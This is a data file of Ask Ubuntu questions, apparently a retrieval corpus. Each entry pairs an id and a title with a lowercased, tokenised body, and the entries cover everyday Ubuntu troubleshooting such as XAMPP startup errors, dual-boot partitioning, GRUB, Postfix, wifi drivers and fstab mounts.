453180	installing xampp error	i followed these instructions : http : //ubuntuportal.com/2013/12/how-to-install-xampp-1-8-3-for-linux-in-ubuntu-desktop.html i already installed lampp in to my directory files under the opt . i am using the terminal control type sudo /opt/lampp/lampp start , i have seen xampp four of them the first one is starting apache fail , second and third is already running , and last one is starting mysql ok.. when i try to open xampp-linux-x64-1.8.3-4-installer.run on my desktop , i get this error : there has been an error this installer requires root privileges . please become superuser before executing the installer . how can fix it ? please help , thanks .
453185	how do i get the libxpcom.so file for titanium appcelerator studio ?	i 'm trying to install titanium appcelerator studio under ubuntu 14.04 64-bit ... launches almost fine , except it needs libxpcom.so . been looking for it for hours now , cant find the latest version of it . i have read that that lib comes with the xulrunner package . downloaded the latest version or xulrunner . but lib is still missing . where can i find the latest version of libxpcom.so ?
453186	server 12.04 can be pinged and accessed by ssh but can not reach any host	my server 12.04 can be pinged and be accessed via ssh but can not reach any other host ( lan and wan ) itself . my /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.24.6.11 netmask 255.255.255.0 gateway 10.24.6.1 dns-nameservers 10.24.6.1 if you need any further information about the system feel free to ask ! thanks in advance ! !
453189	how do i stop a daemon when the user logs out ?	i wrote a daemon in c++ which is automatically started on login using a bash script placed in /etc/profile.d/ while running the install section of my makefile . the problem is that when i log out and log back in , there are now two instances of the daemon running . what i would have liked is for the first one to stop when i logged out , not keep going . it 's only meant to run while somebody is logged in , anyhow . how do i make sure my daemon is not still running after i logout ?
453191	real time message notification app for askubuntu and/or stackexchange	i was wondering if there is any way to get notified in real time when someone replies to my posts/comments that i write in here , on askubuntu.com , other than via email notifications . what i have in mind is some light application that can be used in ubuntu , and maybe windows for instant messaging or message notification , something called askubuntu notification daemon or stackexchange messenger or whatever .
453193	tap-to-click not working in lubuntu 14.04	i have quite a strange problem . my sister upgraded her lubuntu yesterday to 14.04 and everything went alright . after some reboots though ( she said she had n't done anything except for messing with the look and feel settings ) the tap-to-click on the touchpad suddenly stopped working . scrolling works alright . what i 've done : checked the mouse options . everything was fine . logged in as guest . tap-to-click worked just fine . put in the line option `` tapbutton1 '' `` 1 '' into the inputclass section of 50-synaptics.conf . after rebooting/logging out nothing has changed . tried synclient tapbutton1=1 . that works in the current session . put in the xorg.conf folder a new configuration file . still , i was n't able to fix the problem permanently . i could n't find any other solutions apart from the one described in 3 . i would be really thankful for any suggestions : )
453195	i need advice on partition sizing/placement , please	i have installed 14.04 lts in a dual boot configuration with windows 7 . hd size is 500 gb . before installing ubuntu i used gparted to get approximately a 250 gb partition for the ubuntu installation . what i would like to do now is give the root partition 30gb , increase the size of the swap partition , and have the rest available for other things . given my current configuration , can i just do the resizing without moving anything around ? i 'm confused by the 233gb extended partion at sda4 . this is how things are set up at present : device boot start end blocks id system /dev/sda1 2048 34605055 17301504 27 hidden ntfs winre /dev/sda2 * 34605056 34809855 102400 7 hpfs/ntfs/exfat /dev/sda3 34809856 488038323 226614234 7 hpfs/ntfs/exfat /dev/sda4 488038398 976771071 244366337 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 488038400 964521983 238241792 83 linux /dev/sda6 964524032 976771071 6123520 82 linux swap / solaris
453196	lubuntu 14.04 software updater behaviour	will the lubuntu software updater install ubuntu on my pc ? i am wanting to upgrade to 14.04 , but i am not sure if it will install unity or ubuntu-default packages . i am running 64bit 13.10 lubuntu . if the upgrade procedure does install ubuntu-defaults and unity , how can i get rid of them ?
453198	ubuntu on a gateway m285	is there a step by step process to correctly install ubuntu on my gateway m285e laptop ? i have tried loading zorin , ubuntu , and elementary os , but i think my video card is causing black screens and fatal errors . i was hoping for a logical process to install ubuntu and get the ati compatible driver working . i am new to linux and i have just learned how to enter commands into the console and edit the grub menu . currently i am getting a `` low graphics mode '' warning from xorg .
453201	phonegap create test not working	i installed node.js and npm on my ubuntu 14.04 system using : sudo apt-get install nodejs sudo apt-get install npm i then tried to install phonegap with npm install -g phonegap . everything seemed fine , but when i try run phonegap create test nothing happens . it just returns a non zero error , but does n't display any specific error . i did exactly how what the instructions suggested , still no luck ! can anyone tell what am i missing ?
453202	installing ubuntu ( dual boot ) with mac os 10.9.2	can anyone could point me in the right direction for installing ubuntu ( the latest version ... 14.something ) to dual boot alongside my existing mac os 10.9.2 ? i just want to make sure i do it right . thanks !
453203	no grub menu at boot - ubuntu 12.04	i just installed ubuntu 12.04 on my laptop . it already had windows 8 preinstalled . when the install completed , and the system rebooted , i was surprised to see it boot straight into ubuntu . i was expecting to be given an option as to which os to load when i booted the machine . how do i make the os selection menu visible so that i can choose between windows and ubuntu at boot ? here are a few screenshots :
453204	system-config-samba and galternatives wo n't work on trusty with similar errors	fresh installed trusty , then i installed two programs i always use , galternatives and system-config-samba . they both fail with similar output : system-config-samba output : gksu system-config-samba /usr/share/system-config-samba/mainwindow.py:62 : warning : invalid ( null ) pointer instance self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : warning : g_signal_connect_data : assertion 'g_type_check_instance ( instance ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : gtkwarning : ia__gtk_settings_get_for_screen : assertion 'gdk_is_screen ( screen ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : warning : g_object_get : assertion 'g_is_object ( object ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : gtkwarning : ia__gdk_pango_context_get_for_screen : assertion 'gdk_is_screen ( screen ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : pangowarning : pango_context_set_font_description : assertion 'context ! = null ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : pangowarning : pango_context_set_base_dir : assertion 'context ! = null ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : pangowarning : pango_context_set_language : assertion 'context ! = null ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : pangowarning : pango_layout_new : assertion 'context ! = null ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : pangowarning : pango_layout_set_attributes : assertion 'layout ! = null ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : pangowarning : pango_layout_set_text : assertion 'layout ! = null ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : pangowarning : pango_layout_get_unknown_glyphs_count : assertion 'pango_is_layout ( layout ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : warning : value `` true '' of type 'gboolean ' is invalid or out of range for property 'visible ' of type 'gboolean' self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : gtkwarning : ia__gdk_screen_get_display : assertion 'gdk_is_screen ( screen ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) /usr/share/system-config-samba/mainwindow.py:62 : gtkwarning : ia__gdk_keymap_get_for_display : assertion 'gdk_is_display ( display ) ' failed self.xml = gtk.glade.xml ( `` /usr/share/system-config-samba/system-config-samba.glade '' , domain= '' system-config-samba '' ) galternatives output : /usr/lib/pymodules/python2.7/galternatives/main.py:52 : warning : invalid ( null ) pointer instance self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : warning : g_signal_connect_data : assertion 'g_type_check_instance ( instance ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gtk_settings_get_for_screen : assertion 'gdk_is_screen ( screen ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : warning : g_object_get : assertion 'g_is_object ( object ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : warning : value `` true '' of type 'gboolean ' is invalid or out of range for property 'visible ' of type 'gboolean' self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gdk_pango_context_get_for_screen : assertion 'gdk_is_screen ( screen ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_context_set_font_description : assertion 'context ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_context_set_base_dir : assertion 'context ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_context_set_language : assertion 'context ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_new : assertion 'context ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_text : assertion 'layout ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_attributes : assertion 'layout ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_alignment : assertion 'layout ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_ellipsize : assertion 'pango_is_layout ( layout ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_single_paragraph_mode : assertion 'pango_is_layout ( layout ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_width : assertion 'layout ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_get_extents : assertion 'layout ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_get_pixel_extents : assertion 'pango_is_layout ( layout ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : screen for gtkwindow not set ; you must always set a screen for a gtkwindow before using the window self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gtk_icon_theme_get_for_screen : assertion 'gdk_is_screen ( screen ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gtk_icon_size_lookup_for_settings : assertion 'gtk_is_settings ( settings ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : invalid icon size 3 self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gtk_icon_theme_load_icon : assertion 'gtk_is_icon_theme ( icon_theme ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : error loading theme icon 'document-new ' for stock : self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : /build/buildd/gtk+2.0-2.24.23/gtk/gtkstyle.c:2358 : invalid icon size '3' self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gtk_style_render_icon : assertion 'pixbuf ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : warning : g_object_ref : assertion 'g_is_object ( object ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_context_get_language : assertion 'context ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_context_get_metrics : assertion 'pango_is_context ( context ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_font_metrics_get_approximate_char_width : assertion 'metrics ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : error loading theme icon 'document-properties ' for stock : self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : error loading theme icon 'edit-delete ' for stock : self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_justify : assertion 'layout ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_set_wrap : assertion 'pango_is_layout ( layout ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gdk_screen_get_width : assertion 'gdk_is_screen ( screen ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_layout_get_context : assertion 'layout ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_font_metrics_get_approximate_digit_width : assertion 'metrics ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_font_metrics_get_ascent : assertion 'metrics ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : pangowarning : pango_font_metrics_get_descent : assertion 'metrics ! = null ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : gtk_widget_size_allocate ( ) : attempt to allocate widget with width -937041 and height 32 self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gdk_screen_get_default_colormap : assertion 'gdk_is_screen ( screen ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gdk_colormap_get_visual : assertion 'gdk_is_colormap ( colormap ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gdk_screen_get_root_window : assertion 'gdk_is_screen ( screen ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) /usr/lib/pymodules/python2.7/galternatives/main.py:52 : gtkwarning : ia__gdk_window_new : assertion 'gdk_is_window ( parent ) ' failed self.gui = glade.xml ( '/usr/share/galternatives/galternatives.glade ' ) thanks in advance .
453208	postfix not sending mail , returning `` network is unreachable ''	i have just configured postfix , and now i can not send e-mail from php 's mail ( ) function . apr 23 01:06:13 roshu-h55m-ud2h postfix/qmgr [ 1535 ] : 6d5562f82842 : from= , size=397 , nrcpt=1 ( queue active ) apr 23 01:06:13 roshu-h55m-ud2h postfix/error [ 3526 ] : 6d5562f82842 : to= , relay=none , delay=0.55 , delays=0.49/0/0/0.06 , dsn=4.4.1 , status=deferred ( delivery temporarily suspended : connect to alt2.gmail-smtp-in.l.google.com [ 2607 : f8b0:4003 : c02 : :1b ] :25 : network is unreachable ) can someone please tell me why this is happening , and how to fix it ?
453211	what is the safe way to replace ubuntu 12.04 ( installed in dual-boot with w7 ) with opensuse 13.1 ?	this question is related to : how can i remove ubuntu from my dual-boot and replace it with another distribution ? laptop : dell xps l502x , 64-bit existing os : windows 7 + ubuntu 12.04 ( in dual-boot ) i tried to proceed with the installation dvd of opensuse 13.1 , at the stage where it asks `` new installation '' or `` update an existing system '' . i do not know what to do next , i am just stuck here , i checked in both the options . the new installation seem to wipe the existing os and the update will not install the automatic configurations ( with all programs ) . i am afraid to loose windows . i do not want to install windows again because it is from the manufacturer when i bought the laptop . anyone can provide a step-by-sept guide , or any external link ?
453213	gnome top bar has no on-line accounts icon ( gnome-ubuntu-14.04 )	this might be unsolvable but : after the update ( to 14.04 from 13.10 ) the status icon for empathy/on-line accounts vanished , now i dint know if i am connected to facebook , gmail and other nsa associations . is there a way to put it back in or replace it ?
453216	is there a way to theme the ubuntu apps / browser on 14.04	i recently upgraded to ubuntu 14.04 with a fresh install . i use an telegram app . in 12.04 it was opening in chrome , now in ubuntu browser ( i think that 's the name ) with no problem except that it does n't get themed by the theme i have installed in the system . it shows a blue top bar . is there a way to theme it or customize it ? ( i edit , as suggested , to add a screenshot . from behind to front : firefox , chromium , telegram web app and nautilus ) screenshot :
453221	help understanding initial init script to create root fs in ram	i 'm trying to get a handle on the init process in linux & ubuntu so that i can create a small netbootable image that runs in memory ( no local disk ) what i have managed to do is debootsrap a minbase variant of trusty to a directory . then add some files and packages . if i repackage that back up and netboot it , it gets all the way through to calling init before it kernel panics saying that it does n't have a root directory . taking some inspiration from tinycore linux i worked out that they have another init file found in root containing : # ! /bin/sh mount proc grep -qw multivt /proc/cmdline & & sed =i s/^ # tty/ /etc/inittab if ! grep -qw noembed /proc/cmdline ; then inodes=`grep memfree /proc/meminfo | awk ' { print $ 2/3 } ' | cut -d. -f1` mount / -o remount , size=90 % , nr_inodes= $ inodes umount proc exec /sbin/init fi umount proc if mount -t tmpfs -o size=90 % tmpfs /mnt ; then if tar -c / -- exclude=mnt -cf - . | tar -c /mnt/ -xf - ; then mkdir /mnt/mnt exec /sbin/switch_root mnt /sbin/init fi fi exec /sbin/init but i do n't understand why this file would make netbooting work with an in memory fs versus not having this file and simply allowing the kernel to call /sbin/init by the way , i 'm not passing noembed .
453222	dell inspiron intel 7260 wifi connects and then drops on ubuntu 14.04	i 've been trying to connect my wireless card unsuccessfully . i 've tried similar questions/answers with no luck . i tried with ubuntu 13.10 with same results but loading latest iwlwifi-7260-7.ucode did work for a while , till now with 14.04 . the laptop 's wifi card is `` intel corporation wireless 7260 '' . dmesg | grep iwlwifi [ 31.566955 ] iwlwifi 0000:02:00.0 : irq 63 for msi/msi-x [ 31.865873 ] iwlwifi 0000:02:00.0 : loaded firmware version 22.24.8.0 op_mode iwlmvm [ 31.887194 ] iwlwifi 0000:02:00.0 : detected intel ( r ) wireless n 7260 , rev=0x144 [ 31.887249 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s sudo lshw -c network *-network description : wireless interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 73 serial : fc : f8 : ae : af : ad:34 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=22.24.8.0 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:63 memory : b0500000-b0501fff iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off tried using iwlwifi-7260-7.ucode and iwlwifi-7260-8.ucode but same results .
453227	trying to move usr and home to usb drive	i 'm running ubuntu through crouton on a chromebook 14 and since the system only has 18gb of space i want to put /home and /usr on a 32gb flash drive that i will have attached to the system . i have partitioned the flash drive so that it has a partition for each and have used this command to copy all the files to the proper partitions : find . -depth -print0 | cpio -- null -- sparse -pvd /media/removable/partition i then edited /etc/fstab as follows : uuid=9fee4259-6db6-43c6-b2e6-624b719eb56e /home ext4 defaults 0 uuid=db1c7b5c-a41b-4196-8ce7-76b0b028bd44 /usr ext4 defaults 0 the uuids matche the values from here : spyke01 @ localhost : ~/downloads/wakfu $ ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 apr 19 16:43 224669a3-b991-450d-9988-a3629b676f29 - > ../../sda8 lrwxrwxrwx 1 root root 10 apr 19 16:43 38304b06-9dad-409a-9224-e52d08aec1f5 - > ../../dm-1 lrwxrwxrwx 1 root root 10 apr 19 16:43 6bd3242b-3d58-479e-b127-d6100d1fe7f6 - > ../../sda1 lrwxrwxrwx 1 root root 10 apr 19 17:07 9dbb-0616 - > ../../sdb7 lrwxrwxrwx 1 root root 10 apr 19 16:43 9fee4259-6db6-43c6-b2e6-624b719eb56e - > ../../sdb6 lrwxrwxrwx 1 root root 11 apr 19 17:07 afe1-b40b - > ../../sda12 lrwxrwxrwx 1 root root 10 apr 19 16:43 db1c7b5c-a41b-4196-8ce7-76b0b028bd44 - > ../../sdb5 i 've rebooted but it does n't appear that the partitions have mounted to the /home and /usr locations . here 's the output showing this : spyke01 @ localhost : ~/downloads/wakfu $ df df : `/mnt/stateful_partition ' : no such file or directory df : `/usr/share/oem ' : no such file or directory df : `/mnt/stateful_partition/encrypted ' : no such file or directory df : `/home/chronos ' : no such file or directory df : `/sys/fs/cgroup/cpu ' : no such file or directory df : `/sys/fs/cgroup/freezer ' : no such file or directory df : `/var/run/debugfs_gpu ' : no such file or directory df : `/home/.shadow/6c517dc388e0d347457c1f0a1f03a9221bf84c79/mount ' : no such file or directory df : `/home/chronos/user ' : no such file or directory df : `/home/user/6c517dc388e0d347457c1f0a1f03a9221bf84c79 ' : no such file or directory df : `/home/chronos/u-6c517dc388e0d347457c1f0a1f03a9221bf84c79 ' : no such file or directory df : `/home/root/6c517dc388e0d347457c1f0a1f03a9221bf84c79 ' : no such file or directory df : `/var/run/crw ' : no such file or directory filesystem 1k-blocks used available use % mounted on rootfs 10978244 5996712 4417208 58 % / /dev/root 10978244 5996712 4417208 58 % / devtmpfs 1992096 544 1991552 1 % /dev tmp 1993232 264 1992968 1 % /tmp shmfs 1993232 31192 1962040 2 % /dev/shm /dev/sda1 10978244 5996712 4417208 58 % /home /dev/mapper/encstateful 10978244 5996712 4417208 58 % /var varrun 398648 28 398620 1 % /var/run varlock 5120 0 5120 0 % /var/lock media 10978244 5996712 4417208 58 % /media /dev/sda1 10978244 5996712 4417208 58 % /usr/local none 1992096 544 1991552 1 % /dev/pstore /dev/sdb5 9948012 1851048 7584964 20 % /media/removable/usr /dev/sdb6 7110700 1984864 4757964 30 % /media/removable/home /dev/sdb7 13891312 8 13891304 1 % /media/removable/data /dev/sda1 10978244 5996712 4417208 58 % / devtmpfs 1992096 544 1991552 1 % /dev shmfs 1993232 31192 1962040 2 % /dev/shm tmp 1993232 264 1992968 1 % /tmp tmpfs 398648 28 398620 1 % /run tmpfs 5120 0 5120 0 % /run/lock varrun 1993232 56 1993176 1 % /var/host/dbus varrun 1993232 56 1993176 1 % /var/host/shill varrun 1993232 56 1993176 1 % /var/host/cras /dev/mapper/encstateful 3237632 59628 3178004 2 % /var/host/timezone /dev/root 1032088 949816 82272 93 % /lib/modules/3.8.11 media 1993232 0 1993232 0 % /var/host/media /dev/sdb5 9948012 1851048 7584964 20 % /var/host/media/removable/usr /dev/sdb6 7110700 1984864 4757964 30 % /var/host/media/removable/home /dev/sdb7 13891312 8 13891304 1 % /var/host/media/removable/data /home/.shadow/6c517dc388e0d347457c1f0a1f03a9221bf84c79/vault 10978244 5996712 4417208 58 % /home/spyke01/downloads i do n't know if the errors at the top give any info on the issue . how do i fix this ?
453228	the program 'gsi ' is currently not installed . gambit scheme	i installed the gambit scheme with the source from here as follows : cd gambcfolder ... ./configure -- enable-single-host make sudo make install but something is wrong . when i run gsi i get an error : the program 'gsi ' is currently not installed . you can install it by typing : sudo apt-get install gambc i had installed gambc from the repository , but i had some problems using slib , so i removed it .
453230	how to open an encrypted usb on other ubuntu box	i encrypted a usb flash drive on my ubuntu laptop and want to open it on my house desktop which also uses ubuntu . when i try to open it i receive the following error : error unlocking /dev/sdb1 : command-line `cryptsetup luksopen `` /dev/sdb1 '' `` luks-eec41b20-5363-473d-be88-bb3c2f0b7fff '' ' exited with non-zero exit status 2 : no key available with this passphrase . how do i add the passphrase to my desktop box ?
453232	printer does not work after changing os to ubuntu	i changed os from windows 7 to ubuntu . all is fine , but my printer will not print . settings indicate it is linked . screen even shows it is transferring data , but no page is produced . does anyone have any suggestions on how to troubleshoot this ?
453240	no dash or menus , ca n't login after upgrade from 12.04 to 12.10	i am a newbie who recently installed 12.04 lts on an acer travelmate 2301xc notebook ( intel celeron m320 processor 1.3ghz with 1 gb ram ) and also the xfce desktop environment . most apps were running fine . problems began when i upgraded from 12.04 to 12.10 . at first my problem was having no desktop after logging in , i.e . no dash or menus anywhere , though i could use keystrokes to access terminal and even run some apps in their guis . then ubuntu stopped recognizing my login password ( which i have not changed ) . when i enter it in the startup window that displays ubuntu 12.10 , the screen goes black , then relaunches the same login prompt . stuck in a loop . here are some example messages : errors were encountered while processing linux-image-3.5.0-48-generic_3.5.0-48.72_i386.deb could not resolve 'ca/archive.ubuntu.com' failed to fetch ... you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-extra-3.5.0-48-generic : depends : linux-image-3.5.0-48-generic but it is not installed linux-image-generic : depends : linux-image-3.5.0-48-generic but it is not installed e : unmet dependencies . try using -f. i 've tried apt-get -f install , plus various cleanup switches and commands i found , but nothing has worked so far . this has been a test installation , so i 'm not concerned about any data loss from reinstalling or other radical measures . i am still able to access terminal via ctrl-alt-f2 and maybe it 's possible to repair the errors from there . any suggestions appreciated . thanks .
453241	bootproblems after second os installation	my problem : i had windows 7 on my old hdd . bought 120gb ssd to install windows 7 and ubuntu 14.04 in dualboot . disabled hdd . windows installation - > create 60gb partition for win7 , works . next : ubuntu installation - > create 60gb partition out of the empty space of the ssd , works ! reboot : grub - > choose windows7 loader , 1 second dark , reopens grub . ubuntu still works . if i enable my hdd a second win7 loader is in the grub bootlist , works . please tell me how can i fix it , thank you !
453242	disabling bluetooth and ivp6 in lubuntu 14.04 does not work	the method i utilized to disable bluetooth and ivp6 in lubuntu 13.10 apparently does not work in lubuntu 14.04 . attempted three times and all three times i could not even boot to desktop . error messages . in 13.10 i did the following : sudo gksudo leafpad /etc/modprobe.d/blacklist.conf blacklist ipv6 blacklist rfcomm blacklist bnep blacklist btusb blacklist bluetooth sudo gksudo leafpad /etc/modprobe.d/blacklist-rare-network.conf disable bluetooth alias net-pf-31 off the above method worked fine in 13.10 . when i attempt the same method in 14.04 i get error messages upon boot that the entries are being ignored . however the screen just stays frozen on the messages . when i do a cold reboot and go into recovery mode , choose root and attempt to remove the entries i get an error message stating that leafpad can not be accessed or something to that effect . so i have to start over again with a clean install . please advise if possible . maybe ivp6 and bluetooth can not be disabled in 14.04 ? is there a way to prevent start-up of both rather than a full disable ?
